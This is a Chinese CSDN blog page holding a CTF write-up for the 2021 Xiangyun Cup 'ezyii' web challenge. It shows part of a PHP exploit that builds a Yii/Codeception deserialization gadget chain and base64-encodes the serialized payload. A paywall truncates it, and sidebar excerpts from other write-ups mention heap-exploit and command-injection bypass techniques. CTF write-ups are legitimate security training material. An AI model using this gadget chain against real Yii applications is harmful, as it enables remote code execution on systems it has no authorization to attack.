[祥云杯2021]几道简单题的wp

最新推荐文章于 2022-10-31 11:21:44 发布
最新推荐文章于 2022-10-31 11:21:44 发布
阅读量4.3k 收藏 6
点赞数 14
分类专栏: 比赛wp 文章标签: php 安全 信息安全 web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_51078229/article/details/119840772
版权

ezyii

https://xz.aliyun.com/t/9948

找yii链子打,开局就给了反序列化,看了一下是文章里面的第四条链子

exp

<?php
namespace Codeception\Extension{
   
    use Faker\DefaultGenerator;
    use GuzzleHttp\Psr7\AppendStream;
    class  RunProcess{
   
        protected $output;
        private $processes = [];
        public function __construct(){
   
            $this->processes[]=new DefaultGenerator(new AppendStream());
            $this->output=new DefaultGenerator('jiang');
        }
    }
    echo base64_encode(serialize(new RunProcess()));
}

namespace Faker{
   
    class DefaultGenerator
{
   
    protected $default;

    public function __construct($default = null)
    {
   
        $this->default = $default;
}
}
}
namespace GuzzleHttp\Psr7{
   
    use Faker\DefaultGenerator;
    final class AppendStream{
   
        private $streams
最低0.47元/天 解锁文章
huamanggg
关注
  • 14
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 15
    评论
专栏目录
WP-2021祥云
ce666666的博客
01-16 668
前言 好多审计,懒狗的我,自愧不如。赛后借助各位师傅的wp进行复现,不会的目赛后加强学习知识点,盲看没什么用。 链接 复现平台:https://buuoj.cn/ 参考大佬博客:https://www.anquanke.com/post/id/251221 WEB ezyii 这就是网上有的yii链子,1day好像。利用这个https://xz.aliyun.com/t/9948#toc-6直接拿。  代码 <?php namespace Codeception\Extension{ u
[祥云2021Wp]
qq_42906381的博客
08-24 308
MISC新的改变功能快捷键合理的创建标,有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能,丰富你的文章UML 图表FLowchart流程图导出与导入导出导入 你好! 这是你第一次使用 Markdown编辑器 所展示的欢迎页。如果你想学习如何使用Markdown编辑器, 可以仔细阅读这篇文章,了解一下Markdown的基本语
祥云2021 Web简单wp
feng的博客
08-23 580
前言 千言万语汇成一句:我真是太菜了。事实证明只会个php在卷成这样的ctf比赛里面只能挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打。 不会Java和js直接下线,只能卑微的做最简单
2021祥云web 部分wp
fmyyy1的博客
08-23 725
ezyii 说是最新的链子,目把文件都筛选好了让我们找。写一下我的思路 看到RunProcess类 <?php namespace Codeception\Extension; class RunProcess { protected $output; protected $config = ['sleep' => 0]; protected static $events = []; private $processes = []; publ
2021 祥云 RE dizzy WP
AlwaysBetter
08-28 352
这道 其实是一道模拟 作者估计也没想到 被hexRay背刺了 大概思想是模拟了 加 减 异或三种运算 可惜模拟的子片段能被hexRay识别并分析,导致把maxFunSize参数上限调高后,ida直接把运算式生成了: byte_43841C[6] += byte_43841C[3]; byte_43841C[10] -= byte_43841C[27]; byte_43841C[10] += byte_43841C[6]; byte_43841C[14] += byte_43841C[3]; byte_
祥云2021目汇总 祥云.7z
08-31
祥云2021目汇总 祥云.7z
2020祥云 CTFNu1L.pdf
03-15
2020祥云 CTF WP 高清PDF版
CTF祥云2022-1030-真
最新发布
11-01
CTF祥云2022-1030-真
第二届祥云 Web 解1
08-03
考点:SSRF、session条件竞争随意用户名都可以登陆,接着是SSRF的内容,通过访问 http://127.0.0.1/admin/ ,获得include
祥云飞龙:2021年半年度报告.PDF
09-01
祥云飞龙:2021年半年度报告.PDF
2021祥云部分wp
m0_51357657的博客
08-24 881
祥云2021 目前只做了两道(没办法 tcl。。。 MISC-鸣雏恋 下载下来是个word,打开只有一句话 不太对劲,放到010里看一看发现文件头50 4B 03 04 经典压缩包了,文件后缀改成zip,解压 得到一个txt和加密压缩包,文件打开感觉什么都没有。。。 但仔细看,第二行可显示字符没有190,所以是零宽度字符隐写 vim 一下,果然 放到在线网站上解一下 压缩包解完有129488张图片,两种图片代表01,转成二进制 二进制转换成ASCII码之后,发现是个base64转png 接下
2021祥云 CTF pwn解 wp
qq_39948058的博客
08-26 1171
前言:都不难,我好气,这次被大佬带飞,队里的pwn手都是神级别的,这里出了三道,如果我不是sha,我应该能出五道,可是我好菜,这里贴出一下 note: 思路:自己构建格式化字符串漏洞,自己打,先打IO——stdout,泄露libc基地址,再打的是reallochook为onegadget,然后进行申请获取rce exp: #coding:utf-8 from pwn import * context.log_level = "debug" p = process("./note") libc =
【pwn】2021 祥云 (部分)
woodwhale的博客
10-07 4181
【pwn】2021 祥云 (部分) 前言 国庆的最后几天,一直在补,发现祥云那个时候一道堆都不会,直接开始补。 补过程中,发现自己还是太菜了,对着师傅们的wp都有些不明白.jpg 1、note 这应该是祥云里最简单目了QAQ。但是之前没有学过IO,参考一位师傅写的这篇博客,pwn堆利用的一些姿势 – IO_FILE 漏洞点在于scanf的格式化字符串,可以任意位置写。发现stack中有_IO_2_1_stdout_那么,我们写入p64(0xfbad1800) + p64(0)*3来泄露
祥云部分pwn的wp
eeeeeight的博客
08-24 1224
lemon 主要问是2.26版本下, 未控制好指针导致任意写 数据结构如下: lemon_name: lemon_content: 主要可利用的函数是color: 里的buf是指lemon_name结构, 所以可以控制指针lemon_addr的指向了, 因为只能用一次所以想控制整个tcache结构 其它一点可利用的函数: 开头的一次welcome: 虽然是有rand, 但无随机数种子, 所以是固定值, z3一把????! eat函数: 可以打印chunkaddr第四字节, 用于配合后面分配堆块 整
[ctf misc][2021祥云初赛]层层取证
ShenZ的博客
08-23 2486
呜呜写博客以来第一次线上做出目了 [2021祥云初赛]层层取证 附件: Forensic_9b23172e1dba502daa656b8d4234897f.rar 内含win7x64电脑镜像和内存镜像disk_image.rar,memdump.rar 1.初步分析 disk_image 首先取证大师 得到xiaoming用户NT密码哈希值:92efa7f9f2740956d51157f46521f941,cmd5网站在线解密(是付费的) 在xiaoming账户的桌面上可以看到叫flag.txt
一个菜鸡的祥云wp(只有签到和进制反转)
00勇士王子的博客
11-23 751
MISC 签到 看着这熟悉的编码形式,直接进行base64解码,得到flag(注意不用加=) 进制反转 目附件链接 提取码:biw9 下载附件后,是一个.rar压缩包,双击打开时,发现提示文件已损坏,打不开。 然后想到目中的“有时候还是手机好用”这句话,然后把压缩包发送到手机上,看能不能打开 用手机打开,发现rar文件里包含了一个flag.wav文件,上网查了一下, 于是想要在手机上下载这个wav文件,却发现下载不了 能看见,就是下载不了,气不气? 然后又回到电脑上,手机可以打开,电脑却报
祥云202部分wp
会下雪的晴天
12-12 503
title: 祥云202部分wp date: 2020-11-21 17:00:00 tags: CTF categories: 比赛 link:https://yq1ng.github.io/ 目录签到Commandflaskboteasygogogodoyouknowssrf 第一次比赛做出来这么多,感谢太空人师傅给的很多思路,不得不说,师傅真滴强 签到 base64解码,讲真,这才叫签到 Command %09制表符 通配符绕过,payload:?url=||ca\t%09/etc/..
【pwn】2022 祥云 部分wp
woodwhale的博客
10-31 1213
2022 祥云 pwn 部分wp,有空复现别的
2020祥云CTF挑战解析:进制翻转与图像恢复
"2020祥云网络安全竞赛的CTF(Capture The Flag)Write-up,高清PDF版本,包含了赛事中的各种挑战解决方案,主要涉及Miscellaneous(杂项)类问,包括进制转换、音频处理、文件恢复等技术。" 在2020年的祥云...
评论 15
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

huamanggg

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值